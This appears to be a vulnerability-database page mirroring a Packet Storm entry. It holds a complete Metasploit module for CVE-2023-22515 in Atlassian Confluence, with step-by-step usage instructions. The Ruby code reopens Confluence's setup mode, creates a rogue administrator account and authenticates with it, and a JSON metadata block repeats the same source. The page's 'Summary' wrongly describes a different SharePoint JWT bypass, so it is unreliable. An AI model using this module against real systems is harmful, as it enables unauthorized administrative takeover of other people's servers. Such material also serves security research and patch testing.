📄 Confluence 8.x Privilege Escalation_PACKETSTORM:212105

10 / 10

CRITICAL

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

Metasploit module proof of concept exploit that demonstrates an authentication bypass vulnerability Confluence version 8.x...

Visit Original Source

Basic Information

ID PACKETSTORM:212105

Published Nov 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Confluence 8.x Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.atlassian.com/software/confluence |
=============================================================================================================================================

POC :

1. Summary :
a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE‑2023‑29357. (https://packetstorm.news/files/id/207960/)
The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user,
including Site Administrators, without possessing valid credentials.
The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.

===============
# Save & Usage
===============

1. Save module as:
modules/auxiliary/admin/http/confluence_cve_2023_22515.rb

2. Reload Metasploit:
msfconsole
reload_all

3. Use module:
use auxiliary/admin/http/confluence_cve_2023_22515

4. Set options:
set RHOSTS https://target.com
set TARGETURI /
set USERNAME pleasepatch
set PASSWORD Password2

5. Run:
run
-------------------------
auxiliary :
-------------------------
##
# This file is part of the Metasploit Framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Atlassian Confluence Unauthenticated Privilege Escalation (CVE‑2023‑22515)',
'Description' => %q{
This module exploits CVE-2023-22515, an authentication bypass and setup
reopening vulnerability in Atlassian Confluence Data Center and Server.

An attacker can force Confluence into setup mode, then create a NEW
administrator account and authenticate with full admin privileges.

This module replicates the exact behavior of the PoC Python script:
1- trigger vulnerability via /server-info.action?setupComplete=false
2- create admin user
3- authenticate via REST API
},
'Author' => [
'Chocapikk - PoC',
'indoushka - Full Metasploit conversion'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-22515'],
['URL', 'https://github.com/Chocapikk/CVE-2023-22515']
],
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2023-10-04',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Admin username to create', 'pleasepatch']),
OptString.new('PASSWORD', [true, 'Admin password to create', 'Password2'])
]
)
end

#
# Check Vuln
#
def check
v = trigger_setup
return Exploit::CheckCode::Vulnerable if v
Exploit::CheckCode::Safe
end

#
# Exploit
#
def exploit
print_status("Triggering setup mode bypass on target...")
unless trigger_setup
fail_with(Failure::NotVulnerable, 'Could not reopen setup mode.')
end

print_good("Setup mode reopened successfully ✔")

print_status("Creating new administrator account...")
unless create_admin
fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
end

print_good("Admin account created successfully ✔")

print_status("Authenticating to REST API as #{datastore['USERNAME']} ...")

if authenticate_user
print_good("Successfully logged in as #{datastore['USERNAME']}! ✔ FULL ADMIN PWNED ✔")
else
fail_with(Failure::NoAccess, 'Authentication failed after account creation')
end
end

#
# Step 1 — Trigger vulnerability
#
def trigger_setup
send_req(
"GET",
normalize_uri(target_uri.path, "server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false")
)&.code == 200
end

#
# Step 2 — Create Admin
#
def create_admin
data = {
"username" => datastore['USERNAME'],
"fullName" => datastore['USERNAME'],
"email" => "#{datastore['USERNAME']}@localhost",
"password" => datastore['PASSWORD'],
"confirm" => datastore['PASSWORD'],
"setup-next-button" => "Next"
}

res = send_req("POST", normalize_uri(target_uri.path, "setup", "setupadministrator.action"), data)

return false unless res

if res.body.include?("Setup Successful") ||
res.body.include?("A user with this username already exists")
return true
end

false
end

#
# Step 3 — Validate Login
#
def authenticate_user
auth = Rex::Proto::Http::Client::BasicAuthHeader.new(
datastore['USERNAME'],
datastore['PASSWORD']
)

res = send_req(
"GET",
normalize_uri(target_uri.path, "rest/api/user?username=#{datastore['USERNAME']}"),
nil,
auth
)

return false unless res && res.code == 200
true
end

#
# Unified request
#
def send_req(method, uri, data=nil, auth=nil)
begin
send_request_cgi({
'method' => method,
'uri' => uri,
'ctype' => 'application/x-www-form-urlencoded',
'data' => data,
'authorization' => auth ? auth.to_s : nil,
'headers' => {
"X-Atlassian-Token" => "no-check",
"User-Agent" => "Metasploit - CVE-2023-22515"
}
}, 5)
rescue ::Rex::Error::RequestTimeout
return nil
end
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-26T18:14:35",
    "description": "Metasploit module proof of concept exploit that demonstrates an authentication bypass vulnerability Confluence version 8.x...",
    "published": "2025-11-26T00:00:00",
    "modified": "2025-11-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Confluence 8.x Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212105",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2023-22515",
        "CVE-2023-29357"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Confluence 8.x Privilege Escalation                                                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.atlassian.com/software/confluence                                                                               |\n    =============================================================================================================================================\n    \n    POC : \n    \n    1. Summary :\n       a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE\u20112023\u201129357. (https://packetstorm.news/files/id/207960/)\n       The flaw allows an attacker to craft an unsigned JWT token with \"alg\": \"none\" and impersonate any SharePoint user, \n       including Site Administrators, without possessing valid credentials.\n       The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.\n    \n    ===============\n    # Save & Usage \n    ===============\n    \n    1. Save module as:\n       modules/auxiliary/admin/http/confluence_cve_2023_22515.rb\n    \n    2. Reload Metasploit:\n       msfconsole\n       reload_all\n    \n    3. Use module:\n       use auxiliary/admin/http/confluence_cve_2023_22515\n    \n    4. Set options:\n       set RHOSTS https://target.com\n       set TARGETURI /\n       set USERNAME pleasepatch\n       set PASSWORD Password2\n    \n    5. Run:\n       run\n    -------------------------\n    auxiliary               :\n    -------------------------\n    ##\n    # This file is part of the Metasploit Framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n    \n      def initialize(info = {})\n        super(update_info(info,\n          'Name'           => 'Atlassian Confluence Unauthenticated Privilege Escalation (CVE\u20112023\u201122515)',\n          'Description'    => %q{\n            This module exploits CVE-2023-22515, an authentication bypass and setup\n            reopening vulnerability in Atlassian Confluence Data Center and Server.\n    \n            An attacker can force Confluence into setup mode, then create a NEW\n            administrator account and authenticate with full admin privileges.\n    \n            This module replicates the exact behavior of the PoC Python script:\n            1- trigger vulnerability via /server-info.action?setupComplete=false\n            2- create admin user\n            3- authenticate via REST API\n          },\n          'Author'         => [\n            'Chocapikk - PoC',     \n            'indoushka - Full Metasploit conversion'\n          ],\n          'License'        => MSF_LICENSE,\n          'References'     => [\n            ['CVE', '2023-22515'],\n            ['URL', 'https://github.com/Chocapikk/CVE-2023-22515']\n          ],\n          'Platform'       => 'linux',\n          'Arch'           => ARCH_ALL,\n          'Targets'        => [['Automatic', {}]],\n          'DisclosureDate' => '2023-10-04',\n          'DefaultTarget'  => 0\n        ))\n    \n        register_options(\n          [\n            OptString.new('TARGETURI', [true, 'Base path', '/']),\n            OptString.new('USERNAME',  [true, 'Admin username to create', 'pleasepatch']),\n            OptString.new('PASSWORD',  [true, 'Admin password to create', 'Password2'])\n          ]\n        )\n      end\n    \n      #\n      # Check Vuln\n      #\n      def check\n        v = trigger_setup\n        return Exploit::CheckCode::Vulnerable if v\n        Exploit::CheckCode::Safe\n      end\n    \n      #\n      # Exploit\n      #\n      def exploit\n        print_status(\"Triggering setup mode bypass on target...\")\n        unless trigger_setup\n          fail_with(Failure::NotVulnerable, 'Could not reopen setup mode.')\n        end\n    \n        print_good(\"Setup mode reopened successfully \u2714\")\n    \n        print_status(\"Creating new administrator account...\")\n        unless create_admin\n          fail_with(Failure::UnexpectedReply, 'Failed to create admin user')\n        end\n    \n        print_good(\"Admin account created successfully \u2714\")\n    \n        print_status(\"Authenticating to REST API as #{datastore['USERNAME']} ...\")\n    \n        if authenticate_user\n          print_good(\"Successfully logged in as #{datastore['USERNAME']}! \u2714 FULL ADMIN PWNED \u2714\")\n        else\n          fail_with(Failure::NoAccess, 'Authentication failed after account creation')\n        end\n      end\n    \n      #\n      # Step 1 \u2014 Trigger vulnerability\n      #\n      def trigger_setup\n        send_req(\n          \"GET\",\n          normalize_uri(target_uri.path, \"server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false\")\n        )&.code == 200\n      end\n    \n      #\n      # Step 2 \u2014 Create Admin\n      #\n      def create_admin\n        data = {\n          \"username\" => datastore['USERNAME'],\n          \"fullName\" => datastore['USERNAME'],\n          \"email\" => \"#{datastore['USERNAME']}@localhost\",\n          \"password\" => datastore['PASSWORD'],\n          \"confirm\" => datastore['PASSWORD'],\n          \"setup-next-button\" => \"Next\"\n        }\n    \n        res = send_req(\"POST\", normalize_uri(target_uri.path, \"setup\", \"setupadministrator.action\"), data)\n    \n        return false unless res\n    \n        if res.body.include?(\"Setup Successful\") ||\n           res.body.include?(\"A user with this username already exists\")\n          return true\n        end\n    \n        false\n      end\n    \n      #\n      # Step 3 \u2014 Validate Login\n      #\n      def authenticate_user\n        auth = Rex::Proto::Http::Client::BasicAuthHeader.new(\n          datastore['USERNAME'],\n          datastore['PASSWORD']\n        )\n    \n        res = send_req(\n          \"GET\",\n          normalize_uri(target_uri.path, \"rest/api/user?username=#{datastore['USERNAME']}\"),\n          nil,\n          auth\n        )\n    \n        return false unless res && res.code == 200\n        true\n      end\n    \n      #\n      # Unified request\n      #\n      def send_req(method, uri, data=nil, auth=nil)\n        begin\n          send_request_cgi({\n            'method' => method,\n            'uri'    => uri,\n            'ctype'  => 'application/x-www-form-urlencoded',\n            'data'   => data,\n            'authorization' => auth ? auth.to_s : nil,\n            'headers' => {\n              \"X-Atlassian-Token\" => \"no-check\",\n              \"User-Agent\" => \"Metasploit - CVE-2023-22515\"\n            }\n          }, 5)\n        rescue ::Rex::Error::RequestTimeout\n          return nil\n        end\n      end\n    end\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212105",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
        }
    },
    "href": "https://packetstorm.news/files/id/212105/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply